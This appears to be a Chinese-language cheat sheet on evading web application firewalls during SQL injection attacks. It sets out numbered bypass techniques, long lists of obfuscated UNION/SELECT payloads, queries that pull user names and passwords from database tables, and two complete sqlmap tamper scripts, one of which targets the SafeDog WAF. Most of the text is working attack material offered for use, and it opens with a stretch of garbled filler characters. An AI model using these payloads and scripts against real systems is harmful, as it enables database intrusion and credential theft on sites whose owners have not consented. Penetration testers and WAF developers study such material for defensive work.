BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBB&id=1' union select null,concat_ws(char(32,58,32),user,password) from users%23
绕过方式2:函数分隔符绕过(mysql)
规则缺陷/特性:函数与括号之间插入分隔符可以正常执行
对基于正则表达式的WAF,我们猜测安全工程师写WAF规则时,可能不知道函数名与左括号之间可以存在特殊字符,或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法,“concat(”或者”concat\s*(”,就没有考虑到一些特殊字符。相应的绕过方法,在特殊位置引入特殊的分隔符,逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。
绕过技巧:•函数与括号之间可以插入空白符或多行注释达到绕过•GET型请求转POST型
id=-1' union select null,concat_ws(char%0a%0d(32,58,32),user,password) from users #
绕过方式3:协议未覆盖绕过(mysql)
Content-Type 头描述请求体在发送前采用的编码方式。其中 multipart/form-data 表示请求体被编码为一条多部分消息，页面上的每个控件对应消息中的一个 part。当 WAF 没有为某种编码方式编写解析/匹配规则时，以该方式提交的数据就可能绕过检测。
绕过技巧:HTTP 头 Content-Type 常见取值有以下几种（WAF 对每种编码方式的解析覆盖可能不同，需逐一测试）：
Content-Type: text/html;
Content-Type: application/json;charset=utf-8
Content-Type:type/subtype ;parameter
Content-Type:application/x-www-form-urlencoded
Content-Type:multipart/form-data
使用表单请求中的multipart/form-data•关键词换行•GET型请求转POST型
id=-1' union select null,concat_ws
(char(32,58,32),user,password)
from users #
绕过方式4:多行注释符替换绕过（MySQL 与 SQL Server 均支持 /**/ 替代空格；下例中的 [dbo].[User] 是 SQL Server 的标识符写法）
select/**/*/**/from/**/[dbo].[User]/**/where id=1
绕过方式5:HPP分割参数绕过(sqlserver)
绕过原理规则缺陷/特性:HTTP参数污染
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接,于是就有了这个idea。
UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置,通过ASPX的这个特性连起来,堪称完美的一个姿势,压根不好防。
但姿势利用太过于局限:使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来,仅仅作为Bypass分享一种思路而已。
绕过技巧:•GET型请求转POST型•参数传递的顺序:GET->POST->COOKIE•使用多行注释符/**/来闭合分割参数的逗号
post方式 id=get,cookie里面 id=cookie, 包里面 id=post
get 方式 id=11111111111111&id=')+and+1=db_name()--+- 双写id
绕过方式6:chunked
旧版 sqlmap 没有 --chunk 参数可用，只能通过 tamper 脚本实现；较新版本的 sqlmap 已内置 --chunked 参数（对 POST 请求体做分块传输编码），应优先使用内置参数。tamper 方式： sqlmap --tamper=chunkedtamper.py
chunkedtamper.py:内容
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/3/12 5:45 PM
# @Author : w8ay
# @File : chunk.py
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.enums import PRIORITY
from random import sample
# sqlmap tamper hook: relative ordering when several tamper scripts are chained.
__priority__ = PRIORITY.NORMAL
def dependencies():
    """sqlmap hook for declaring DBMS/version requirements; this tamper has none."""
    return None
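def randomIP():
    """Return a random dotted-quad string, e.g. for a spoofed client-IP header.

    Draws four *distinct* octets from 1..254 (``random.sample`` never repeats
    a value) and re-rolls while the first octet is 10, 172 or 192, so the
    result never resembles the common private ranges.  The filter is crude:
    it also rejects public 172.x/192.x addresses and does not exclude 127.x
    or 169.254.x.  Not referenced by ``tamper`` below -- it is left over from
    sqlmap's X-Forwarded-For tamper template.

    Fix: ``xrange`` is Python 2 only and raised NameError under the Python 3
    interpreter current sqlmap runs on; ``range`` is the equivalent.
    """
    octets = []
    while not octets or octets[0] in (10, 172, 192):
        octets = sample(range(1, 255), 4)
    return '.'.join(str(octet) for octet in octets)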
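def tamper(payload, **kwargs):
    """Chunk-encode the payload and announce ``Transfer-Encoding: chunked``.

    The original proof-of-concept discarded the payload and always returned
    the fixed body ``\\r\\n2\\r\\nid\\r\\n0\\r\\n\\r\\n`` (and used Python 2 ``print``
    statements, so it did not even load under current sqlmap).  This version
    keeps the same framing -- a leading CRLF, then hex-length/data chunk
    pairs, then the ``0`` terminator -- but encodes the real payload, two
    characters per chunk so no SQL keyword survives intact inside one chunk.

    Caveats for the tester:
    * sqlmap (or its HTTP stack) presumably still emits Content-Length for
      the body it builds; a request carrying both headers is ambiguous
      (RFC 7230 §3.3.3: Transfer-Encoding takes precedence) and may be
      rejected or de-synchronised by intermediaries.  Verify on the wire.
    * The tampered value is substituted *inside* ``param=``, so this only
      makes sense when that parameter is effectively the whole body.  Current
      sqlmap releases ship a supported ``--chunked`` switch; prefer it.
    * Chunk sizes are counted in characters; the payload is assumed ASCII.

    :param payload: raw sqlmap payload; a falsy payload is returned unchanged.
    :param kwargs: sqlmap passes ``headers``; ``Transfer-Encoding`` is set on it.
    :returns: the chunk-framed payload string.
    """
    headers = kwargs.get("headers", {})
    # Transfer-coding names are case-insensitive; use the canonical spelling.
    headers["Transfer-Encoding"] = "chunked"
    if not payload:
        return payload
    # Leading CRLF terminates the "param=" line so the chunk-size line that
    # follows starts on its own line, as in the original PoC layout.
    return "\r\n" + _chunk_encode(payload)


def _chunk_encode(body, size=2):
    """Frame *body* as HTTP/1.1 chunked transfer coding (RFC 7230 §4.1).

    Each chunk is ``<hex length>\\r\\n<data>\\r\\n``; the sequence ends with the
    zero-length chunk ``0\\r\\n\\r\\n``.  *size* is the number of characters per
    chunk; the last chunk may be shorter.
    """
    pieces = [body[i:i + size] for i in range(0, len(body), size)]
    framed = "".join("%x\r\n%s\r\n" % (len(piece), piece) for piece in pieces)
    return framed + "0\r\n\r\n"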
绕过方式7:ip伪造头（仅当 WAF 信任客户端自带的转发类头部、并据此对本机/内网地址放行时有效；逐个头部单独测试，不要一次全加）
X-Forwarded-For:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-Client-IP:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
绕过方式8:利用multipart/form-data 绕过
HTML 表单的 enctype 有以下三种取值（对应请求头 Content-Type）：
application/x-www-form-urlencoded 编码模式post 提交
multipart/form-data 文件上传模式
text/plain 文本模式
Content-Type: multipart/form-data;
boundary=---------------------------28566904301101419271642457175
boundary 这是用来匹配的值
Content-Disposition: form-data; name="id" 这也能作为post 提交
所以程序会接收到构造的SQL 注入语句-1 union select 1,user()
绕过方式9:url二次编码绕过（对 payload 做两次 URL 编码，如 %0a 写成 %250a；仅当服务端在 WAF 检测之后又额外做了一次 URL 解码时有效，见上面列表中的 %250aunion%250aselect 一类 payload）
绕过方式10:白名单绕过。
白名单通常有目录
/admin
/phpmyadmin
/admin.php
/index.php/1.jpg&id=1
/index.php/1.jpg=/1.jpg&id=1
/1.css=/1.css&id=1
绕过方式11:pipeline 绕过注入
用 Burp Suite 抓包，把整个请求报文复制一份追加到第一个报文的末尾，将第一个报文的 Connection: close 改成 keep-alive，并取消勾选 Burp Suite 的"自动更新 Content-Length"选项（否则第二个报文会被并入第一个请求的请求体）。
该技巧利用的是某些 WAF 只检测同一 TCP 连接上第一个请求的缺陷，是否有效需针对目标实测。
漏洞12:post,OPTIONS,HEAD绕过
有些 WAF 在同一请求中同时存在 GET 参数和 POST 参数时只检查其中一处（例如优先匹配 POST 体），把 payload 放到未被检查的位置即可绕过。
有些程序是json 提交参数,程序也是json 接收再拼接到SQL 执行json 格式通常不会被拦截。所以可以绕过waf.
{'id':1 union select 1,2,3,'submit':1}
同样text/xml 也不会被拦截
POST GET传数据都会被waf拦截,将请求方式修改为OPTIONS,HEAD等成功绕过了waf
漏洞13: 花扩号绕过
select 1,2 union select{x 1},user()
漏洞14:HTTP 数据编码绕过
修改 Content-Type 中 charset 参数的值为 ibm037（EBCDIC 编码）。前提是服务端框架会按该 charset 解码请求体（例如某些 ASP.NET 环境），而 WAF 不做同样的转码，只看到一串"无意义"的字节。
Content-Type: application/x-www-form-urlencoded;charset=ibm037
未编码
id=123&pass=pass%3d1
透过IBM037 编码
%89%84=%F1%F2%F3&%97%81%A2%A2=%97%81%A2%A2~%F1
1. and 绕过
使用 || 代替 or
使用&&代替and
&& 1=1
&& 1=2
|| 1=0
|| 1=1
+or+0x3a!=1--+
+or+0x3a=1--+
and (select 1)=(Select 0x1)
and (select 1)=(Select 0xA*1000)
and ~1>1
and 1=1
and 1=2
and -2<-1
and hex(1)>~1
and hex(1)>-1
and true=true --+
and!!!!1=1
and/*@%$^(*/ 1=1
or 1=0
or 1=1
2. order by 绕过
/&id=1308%20order%20by%2035&b=/
into @a,@b,@c,@d;
order /*//--/*/ by
Order%A0By
order/**/by
order/*--*/by
order/*//*/by
order/**/by
3. union select 绕过
%09union%09select 1,2
%0aunion%0aselect 1,2
%0baunion%0bselect 1,2
%0caunion%0cselect 1,2
%0d%0aunion%0d%0aselect 1,2
%0daunion%0dselect 1,2
--%0dunion select
%23?%0auion%20?%23?%0aselect
%23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
%23x%0A/*!database*/()
%25%37%35%25%36%45%25%36%39%25%36%46%25%36%45%25%32%30%25%37%33%25%36%35%25%36%43%25%36%35%25%36%33%25%37%34
%250aunion%250aselect 1,2
%252f%252a*/union%252f%252a /select%252f%252a*/
%2f**%2funion%2f**%2fselect
%2f**%2funion%2f**%2fselect%2f**%2f
%53eLEct
%55nion %53eLEct
%55nion(%53elect 1,2,3)-- -
%55nion(%53elect)
%75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
(select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!union*/
*9e0UnIoN
*9e0UnIoN*9e0slect
/%2A%2A/union/%2A%2A/select/%2A%2A/
/* */union/* */select/ */1,2;
/*!%53eLEct*/
/*!%55NiOn*/ /*!%53eLEct*/
/*!12345union*//*!12345select*/1,2;
/*!40000union*//*!40000select*/1,2
/*!50000UniON SeLeCt*/
/*!50000union*//*!50000select*/1,2
/*!select*/
/*!u%6eion*/ /*!se%6cect*/
/*!uNIOn*/ /*!SelECt*/
/*!union*//*!00000all*//*!00000select*/1,2
/*!union*//*!select*/1,2
/*!union*/+/*!select*/
/*!UnIoN*/SeLecT+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**//*!union*//**//*!select*//**/
/**/UNION/**//*!50000SELECT*//**/
/**/union/**/select/**/
/*--*/union/*--*/select/*--*/
/*中文*/union/*中文*/select/*中文*/1,2;
\Nselect
\Nunion
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
+#uNiOn+#sEleCt
--+%0d%0aunion--+%0d%0aselect--+%0d%0a1,--+%0d%0a2
+un/**/ion+se/**/lect
+uni%0bon+se%0blect+
+UnIOn%0d%0aSeleCt%0d%0a
+union+distinct+select+
+union+distinctROW+select+
+UNunionION+SEselectLECT+
and(select 1)=(Select 0xA*1000)/*!uNIOn*//*!SeLECt*/ 1,user()
e0union(select!1,)
e0union(select(1),(select user from user limit 1)
e0union(select(1),)
e0union(select/!50000/1,)
e0union(select@'id',)
e0union(select{1},)
e0union(select~1,)
e0union(select+1,)
e0union(select'1',(select user from user limit 1)
e0union(select'1',)
e0union(select-1,)
null+UNION+SELECT+1,2
REVERSE(noinu)+REVERSE(tceles)
s%u0065lect
se%0blect
sel%e%ct
sele%ct
sele/**/ct
select union select{x 1},
u%6eion s%65lect
u%6eion se%6cect
un?+un/**/ion+se/**/lect+
uni%0bon+se%0blect
uni%6fn distinct%52OW s%65lect
uni%u006fn sel%u0065ct
unio%6e %73elect
unio%6e%20%64istinc%74%20%73elect
union -- 1%0a select
union -- hex()%0a select
union %23%0aall select
union (/*!/**/ SeleCT */ 1,2,3)
union (select)
union /*!50000%53elect*/
union /*//--/*/ select
union /*@%$^(*/ select
union /*@%$^(*/ select --+
union all select
union all select 1,2
union all%23%0a select
union DISTINCT select
union DISTINCT select 1,2
UnIoN SeLeCt
union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d******;
union select 1,(select(schema_name)from(information_schema.SCHEMATA)limit 0,1)
union select 1,(select(schema_name)from/*!12345information_schema.SCHEMATA*/limit 0,1)
union select 1,(select(schema_name)from{x information_schema.SCHEMATA}limit 0,1)
uNIoN sELecT 1,2
union select all
union select DISTINCT
union%20%64istinctRO%57%20select
union%20/*!44509select*/%20
union%2053elect
union%20all%23%0a%20select%20
union%20distinct%20select
union%20select%20
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
union%a0%0aselect 1,'2',
union%a0%0aselect 1,'2','3',
union(select%0aall{x users}from{x ddd})
union(select%0adistinct{x users}from{x ddd})
union(select%0adistinctrow{x users}from{x ddd})
union/*!23000select*/
union/*%00*/%23a%0A/*!/*!select
union/*%00*/%23a%0A/*!/*!select%20
union/*%0a%0b%20%a0--*/select
UNION/*&test=1*/SELECT/*&pwn=2*/
union/*&username=*/select
union/**/select/**/1,2
union/*/!*!**/select
union/*/!--**/select
UNION/*/%21*%21**/SELECT
union/*/-*!!*/select
union/*//\\\*/select+1,2--+
union/*//--\\\*/select+1,2--+
UNiOn/*/1/*/select
UNiOn--+%02%0d%0aselect
union+/*!select*/
union+distinctROW+select
UNIunionONSeLselectECT
ununionion selselectect
user/**/()--+
过滤了%23%0a 却不过滤%2d%2d%0a
4. database() 绕过
%23x%0A/*!database*/()
and+0x3a!=info()--
database /*//--/*/ ()
database%23x%0A()
database()||’
database/*!20553()*/--+
database/**/()
database/*xxx*/()
database+()
db_name()
user/**/()--+
union select+1, (select+password+from+`users`+limit+1)--+
union/*//--//*/select+1,(select+password+from+`users`+limit+1)--
1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+
UnIoN%A0SeLeCT*FrOm(SeLeCt 1)a JOIN (SeLeCt 2)b JOIN (SeLeCt 3)c JOIN (SeLeCt 4)d JOIN (SeLeCt 5)e JOIN (SeLeCt 6)f JOIN (SeLeCt 7)g JOIN (SeLeCt 8)h JOIN (SeLeCt 9)i JOIN (SeLeCt 10)j JOIN (SeLeCt 11)k JOIN (SeLeCt 12)l JOIN (SeLeCt 13)m JOIN (SeLeCt 14)n JOIN (SeLeCt 15)o JOIN (SeLeCt 16)p JOIN (SeLeCt 17)q JOIN (SeLeCt 18)r JOIN (SeLeCt 19)s JOIN (SeLeCt 20)t JOIN (SeLeCt 21)w JOIN (SeLeCt 22)x JOIN (SeLeCt 23)y JOIN (SeLeCt 24)z JOIN (SeLeCt 25)2a-- -
5. from 绕过
%23%0afrom
%2d%2d%0afrom
%2d%2d%0from
%a0from
/*!%23/*%0afrom*/
/*!00000%23/*%0afrom*/
/*!from*/
\Nfrom
1efrom
2.0 from
8e0from
CHAR(102, 114, 111, 109)
e0FrOm
FrOFrOmm
FrOm
from/*!--+/*%0ainformation_schema.columns*/
select(1)from
select{x user}from{x mysql.user};
6. information_schema的绕过
`information_schema`.schemata
`information_schema`.`schemata`
information_schema.`schemata`
(information_schema.schemata)
information_schema/**/.schemata
Information_schema./**_**/Tables
7:单引号绕过'
"" (mysql)
select * from users where username=0x61646D696E; # select * from users where username='admin'; select hex('admin');
库名.表名:admin.users
admin+.user
select{x user}from{x mysql.user};
8. substr截取字符绕过
查询m 等于select(substr(database() from 1 for 1))页面返回正常
select * from users where id=1 and 'm'=(select(substr(database() from 1 for 1)));
可以进一步优化m 换成hex 0x6D 这样就避免了单引号
select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));
substr 函数被拦截 换成 mid
select * from users where id=1 and 'm'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x6D=(select(mid(database() from 1 for 1)));
9. limit拦截
limit 1 默认返回第一条数据。也可以使用limit 1 offset 0 从零开始返回第一条记录.
可以用以下等价函数代替来绕过过滤:
1、sleep函数可以用benchmark函数代替
2、ascii函数可以用hex, bin函数代替
3、group_concat函数可以用concat_ws函数代替
4、updatexml函数可以用extractvalue函数代替
AND 等价于 &&
OR 等价于 ||
= 等价于 like
+ 代替 空格
sleep() 等价于 benchmark()
mid()substring() 等价于 substr()
Mid(version(),1,1)
Substr(version(),1,1)
Substring(version(),1,1)
Lpad(version(),1,1)
Rpad(version(),1,1)
Left(version(),1)
reverse(right(reverse(version()),1)
concat(version(),'|',user());
concat_ws('|',1,2,3)
Char(49)
Substring(@@version,1,1)
Left(@@version,1)
Right(@@version,1)
limit 1 offset 0
mid(version() from 1 for 1)
Hex(‘a’)
Unhex(61)
Ascii(1)
用like或in代替=
select * from user where username='user';
select * from user where username like 'user';
select * from user where username in('user');
and exp(~(select * from(select user())x));--+
and exp(~(select%23%0apassword%23%0afrom(select%23%0auser())x));--+
http://id/index.php?id=1 and 1 like 1
like "[%23]" /*!10440union select*/
试延时 payload,将里面的 o 替换为 %u00ba
7. 普通函数的绕过
如:
'
"
.
`users`
~
hex(user/**/(/**/))
8. 报错注入函数的绕过
/*!5000updatexml*/(1,1,1)
/*!11440updatexml*/(1,1,1)
/*!11441extractvalue*/(1, concat(0x5c, (SELECT @@version)))
`updatexml`(1,(select @@version),1)
总之,将报错函数用/*!*/或者``包括起来。
报错注入中使用polygon()函数替换常用的updatexml()函数select polygon((select * from (select * from (select @@version) f) x));
盲注绕过&延时绕过
and!!!!if((substr((select hex(user/**/(/*!*/))),1,1)>1),sleep/**/(/*!5*/),1)
and!!!!1=1 除了!还可以使用~&- 当符号数量为偶数时为真,相当于一个空格,可以用来绕过and后不能使用数字或者字符。
apache特性:
&id=1&id=2 在 Apache+PHP 环境下只取最后一个同名参数（该行为由服务端语言/框架决定：PHP 取最后一个，ASP.NET 会把多个值用逗号拼接，JSP/Servlet 取第一个）
MySQL特性:
空格可以由其它字符替代
select id,contents,time from news where
news_id=1①union②select③1,2,username④from⑤admin
•位置①
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23est%0d%0a、 --+a%0d%0a•可以利用数学运算以及数据类型:news_id=1.0,news_id=1E0,news_id=\N
•位置②
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用括号:union(select 1,2)
•位置③
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•可以利用其它符号:+ 、- 、 ~ 、!、@•位置④
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•大括号{}:union select {``1},{x 2}•可利用数学运算以及数据类型:
union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin
•位置⑤
•可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0•可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a•反引号`:union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23•内联注释:union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23•大括号{}:union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23•小括号():union select 1,table_name,3 from(information_schema.tables)limit 0,1%23
SQLServer特性
空格可以由其它字符替代
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
位置①
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、--+a%0d%0a
可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
位置②
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、--+a%0d%0a
可以利用加号+替换空格:union+select
位置③
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、--+a%0d%0a
可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
可以利用小括号()替换空格:select(1),2,db_name()
位置④
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、--+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
位置⑤
可以利用其它控制字符替换空格:%01~%0F、%11~%1F
可以利用注释符号:/**/、--+a%0d%0a
可利用其他字符:%80~%FF(需要IIS服务器支持)
可以利用点号.替换空格:from.users
可以利用中括号[]替换空格:from[users]
Unicode编码
常用的几个符号的一些Unicode编码:
单引号: %u0027、%u02b9、%u02bc、%u02c8、%u2032、%uff07、%c0%27、%c0%a7、%e0%80%a7
空格:%u0020、%uff00、%c0%20、%c0%a0、%e0%80%a0
左括号:%u0028、%uff08、%c0%28、%c0%a8、%e0%80%a8
右括号:%u0029、%uff09、%c0%29、%c0%a9、%e0%80%a9
mysql sqlmap tamper
#!/usr/bin/env python
# MySQLByPassForSafeDog
# Code By:Tas9er
import re
import string
import os
import random
from lib.core.enums import DBMS
from lib.core.common import singleTimeWarnMessage
def dependencies():
    """Emit sqlmap's one-time warning that this tamper is written for MySQL only."""
    script = os.path.basename(__file__).split(".")[0]
    singleTimeWarnMessage("MySQLByPassForSafeDog / Code By:Tas9er '%s' only %s" % (script, DBMS.MYSQL))
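def tamper(payload, **kwargs):
    """Rewrite a MySQL payload so keyword-matching WAF rules (SafeDog-style) miss it.

    Keywords are hidden inside MySQL versioned comments (``/*!44575...*/`` --
    the five-digit version 44575 is below any real server version, so MySQL
    always executes the comment body) or split with ``/**/``.  At the end the
    comment delimiters themselves are URL-encoded (``/`` -> ``%2F``,
    ``*`` -> ``%2A``); that assumes the value is sent where it is URL-decoded
    exactly once before reaching the database (e.g. a GET parameter).

    Fixes relative to the original replace chain:
    * ``ORDER BY`` is rewritten *before* the bare ``ORD`` rule.  Previously
      ``ORD`` fired first and turned ``ORDER BY`` into ``/*!44575ORD*/ER BY``,
      so the later ``ORDER BY`` rule never matched and every UNION
      column-count probe was mangled.
    * ``AND``, ``ORD`` and ``OR`` are matched on word boundaries, so
      ``RAND(0)`` (used by sqlmap's FLOOR/RAND error-based payloads),
      ``XOR``/``FOR`` and identifiers containing those letters are left intact.
    All other substitutions keep the original order, because later rules
    deliberately operate on the output of earlier ones (the ``USER()`` rule,
    its ``CURRENT_USER()``/``SESSION_USER()`` fix-ups, then the ``()`` rule).

    :param payload: raw sqlmap payload; a falsy payload is returned unchanged.
    :param kwargs: unused (sqlmap passes request context here).
    :returns: the transformed payload string.
    """
    if not payload:
        return payload
    payload = re.sub(r'\bAND\b', '/*%2144575%26%26*/', payload)
    # Must precede the ORD rule; see docstring.
    payload = payload.replace('ORDER BY', caonimabi() + 'ORDER/**/BY')
    payload = re.sub(r'\bORD\b', '/*%2144575ORD*/', payload)
    payload = re.sub(r'\bOR ', '/*%2144575OR*/ ', payload)
    payload = payload.replace('UNION SELECT', 'UNION/*/%21*%21**/SELECT')
    payload = payload.replace('information_schema.tables', '/*!%23%0ainformation_schema.tables*/')
    payload = payload.replace('@', '/*%2144575%40*/')
    # Hex-encoded SELECT inside a versioned comment.
    payload = payload.replace('SELECT', '/*%2144575%53%45%4c%45%43%54*/')
    payload = payload.replace('table_name', caonimabi() + 'table_name')
    payload = payload.replace('MID', caonimabi() + 'MID')
    payload = payload.replace('CAST', caonimabi() + 'CAST')
    # USER() gets a line-comment + newline prefix; the next two lines repair
    # what that rule does to CURRENT_USER() and SESSION_USER().
    payload = payload.replace('USER()', '%23a%0aUSER/*!*/()')
    payload = payload.replace('CURRENT_%23a%0aUSER/*!*/()', caonimabi() + 'CURRENT_USER()')
    payload = payload.replace('SESSION_%23a%0aUSER/*!*/()', '%23a%0aSESSION_USER()')
    payload = payload.replace('()', '/*%2144575%28%29*/')
    payload = payload.replace(' (', '/**/(')
    payload = payload.replace(',(', ',/**/(')
    payload = payload.replace('),', ')/**/,')
    payload = payload.replace(') ', ')/**/')
    # Finally URL-encode the comment delimiters produced above.
    payload = payload.replace('/', '%2F')
    payload = payload.replace('*', '%2A')
    return payload


def caonimabi():
    """Return a random block comment ``/*Tas9er<3-9 alphanumerics>*/``.

    Used as throwaway noise so each request differs for signature-based
    filters.  ``random.sample`` draws *distinct* characters, which is fine
    for noise but is not a security property.  (The name is kept unchanged
    for compatibility with the original script.)
    """
    width = random.randint(3, 9)
    noise = ''.join(random.sample(string.ascii_letters + string.digits, width))
    return '/*Tas9er' + noise + '*/'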